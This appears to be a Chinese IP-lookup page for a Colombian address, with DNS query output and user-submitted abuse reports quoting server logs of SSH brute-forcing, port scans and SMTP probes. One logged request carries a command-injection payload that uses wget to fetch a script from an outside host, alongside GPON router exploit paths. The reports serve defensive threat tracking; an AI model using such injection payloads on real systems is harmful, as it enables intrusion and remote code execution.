191.149.205.112

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): Colombia

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:

点此参与IP信息讨论

暂无关于此IP的讨论, 沙发请点上方按钮

相同子网IP讨论:

暂无关于此IP所属子网相关IP的讨论.

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 191.149.205.112
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 438
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;191.149.205.112.		IN	A

;; AUTHORITY SECTION:
.			541	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022011000 1800 900 604800 86400

;; Query time: 270 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Mon Jan 10 14:58:10 CST 2022
;; MSG SIZE  rcvd: 108

HOST信息:

Host 112.205.149.191.in-addr.arpa. not found: 3(NXDOMAIN)

NSLOOKUP信息:

Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 112.205.149.191.in-addr.arpa: NXDOMAIN

最新评论:

IP	类型	评论内容	时间
188.92.77.12	attack	188.92.77.12 - - [21/Oct/2019:09:19:40 +0300] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.15 (KHTML, like Gecko) Chrome/24.0.1295.0 Safari/537.15" 188.92.77.12 - - [21/Oct/2019:09:19:40 +0300] "POST /apply_sec.cgi HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36" 188.92.77.12 - - [21/Oct/2019:09:20:11 +0300] "GET /cgi-bin/;${IFS}wget${IFS}http://188.92.77.12/get.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.103 Safari/537.36" ...	2019-10-22 00:08:29
109.11.32.80	attackspam	2019-10-21 x@x 2019-10-21 11:49:47 unexpected disconnection while reading SMTP command from 80.32.11.109.rev.sfr.net [109.11.32.80]:17433 I=[10.100.18.23]:25 (error: Connection reset by peer) 2019-10-21 x@x ........ ----------------------------------------------- https://www.blocklist.de/en/view.html?ip=109.11.32.80	2019-10-21 23:55:10
170.82.40.69	attackspambots	Oct 21 12:52:44 ip-172-31-1-72 sshd\[4115\]: Invalid user zeidc from 170.82.40.69 Oct 21 12:52:44 ip-172-31-1-72 sshd\[4115\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=170.82.40.69 Oct 21 12:52:45 ip-172-31-1-72 sshd\[4115\]: Failed password for invalid user zeidc from 170.82.40.69 port 48281 ssh2 Oct 21 12:57:10 ip-172-31-1-72 sshd\[4146\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=170.82.40.69 user=root Oct 21 12:57:13 ip-172-31-1-72 sshd\[4146\]: Failed password for root from 170.82.40.69 port 39184 ssh2	2019-10-22 00:27:03
45.228.137.6	attackspambots	ssh failed login	2019-10-22 00:30:19
103.61.196.254	attackspam	Port 1433 Scan	2019-10-22 00:04:29
118.25.231.17	attackbots	Oct 14 06:31:16 mail sshd[20476]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.25.231.17 Oct 14 06:31:18 mail sshd[20476]: Failed password for invalid user Vivi@123 from 118.25.231.17 port 56822 ssh2 Oct 14 06:36:42 mail sshd[22416]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.25.231.17	2019-10-22 00:03:27
139.199.204.198	attack	SSH Scan	2019-10-21 23:58:01
222.186.175.155	attackbotsspam	Oct 16 16:18:08 mail sshd[12191]: Failed password for root from 222.186.175.155 port 15282 ssh2 Oct 16 16:18:14 mail sshd[12191]: Failed password for root from 222.186.175.155 port 15282 ssh2 Oct 16 16:18:19 mail sshd[12191]: Failed password for root from 222.186.175.155 port 15282 ssh2 Oct 16 16:18:26 mail sshd[12191]: Failed password for root from 222.186.175.155 port 15282 ssh2	2019-10-21 23:56:19
154.183.195.214	attackspambots	2019-10-21 x@x 2019-10-21 12:22:32 unexpected disconnection while reading SMTP command from (host-154.183.214.195-static.tedata.net) [154.183.195.214]:48195 I=[10.100.18.23]:25 (error: Connection reset by peer) 2019-10-21 x@x ........ ----------------------------------------------- https://www.blocklist.de/en/view.html?ip=154.183.195.214	2019-10-22 00:10:57
218.75.98.230	attack	Unauthorised access (Oct 21) SRC=218.75.98.230 LEN=40 TOS=0x10 PREC=0x40 TTL=238 ID=8663 TCP DPT=445 WINDOW=1024 SYN Unauthorised access (Oct 21) SRC=218.75.98.230 LEN=52 TOS=0x10 PREC=0x40 TTL=47 ID=4315 DF TCP DPT=445 WINDOW=8192 SYN Unauthorised access (Oct 17) SRC=218.75.98.230 LEN=52 TOS=0x10 PREC=0x40 TTL=47 ID=8868 DF TCP DPT=445 WINDOW=8192 SYN Unauthorised access (Oct 14) SRC=218.75.98.230 LEN=48 TOS=0x10 PREC=0x40 TTL=111 ID=24387 DF TCP DPT=445 WINDOW=8192 SYN	2019-10-22 00:07:52
37.5.246.204	attackbots	2019-10-21 x@x 2019-10-21 12:41:01 unexpected disconnection while reading SMTP command from (ip2505f6cc.dynamic.kabel-deutschland.de) [37.5.246.204]:51786 I=[10.100.18.20]:25 (error: Connection reset by peer) 2019-10-21 x@x ........ ----------------------------------------------- https://www.blocklist.de/en/view.html?ip=37.5.246.204	2019-10-22 00:07:26
159.65.182.7	attackspambots	Oct 21 16:55:40 mail sshd\[14001\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=159.65.182.7 user=root Oct 21 16:55:43 mail sshd\[14001\]: Failed password for root from 159.65.182.7 port 34310 ssh2 Oct 21 16:59:03 mail sshd\[14023\]: Invalid user niu from 159.65.182.7 Oct 21 16:59:03 mail sshd\[14023\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=159.65.182.7 ...	2019-10-22 00:12:17
70.44.136.66	attackbotsspam	IP Ban Report : https://help-dysk.pl/wordpress-firewall-plugins/ip/70.44.136.66/ US - 1H : (240) Protection Against DDoS WordPress plugin : "odzyskiwanie danych help-dysk" IP Address Ranges by Country : US NAME ASN : ASN3737 IP : 70.44.136.66 CIDR : 70.44.0.0/16 PREFIX COUNT : 84 UNIQUE IP COUNT : 658688 ATTACKS DETECTED ASN3737 : 1H - 1 3H - 1 6H - 1 12H - 2 24H - 2 DateTime : 2019-10-21 13:40:49 INFO : Port Scan TELNET Detected and Blocked by ADMIN - data recovery	2019-10-22 00:24:22
212.224.224.32	attackbotsspam	2019-10-21 x@x 2019-10-21 12:42:36 unexpected disconnection while reading SMTP command from (212-224-224-32-adsl.mobistar.be) [212.224.224.32]:19093 I=[10.100.18.23]:25 (error: Connection reset by peer) 2019-10-21 x@x ........ ----------------------------------------------- https://www.blocklist.de/en/view.html?ip=212.224.224.32	2019-10-21 23:56:48
15.188.53.62	attackspambots	Oct 21 10:13:29 askasleikir sshd[903767]: Failed password for root from 15.188.53.62 port 51164 ssh2	2019-10-22 00:37:19

最近上报的IP列表

167.125.175.197	124.41.131.197	156.116.159.143	142.17.224.205
122.48.234.105	17.109.206.136	173.30.247.43	20.250.196.192
118.10.232.1	12.212.67.175	123.151.213.98	130.219.187.103
143.54.45.161	185.137.146.237	107.230.251.226	159.155.188.159
251.144.110.248	235.97.184.247	115.200.189.170	13.226.82.47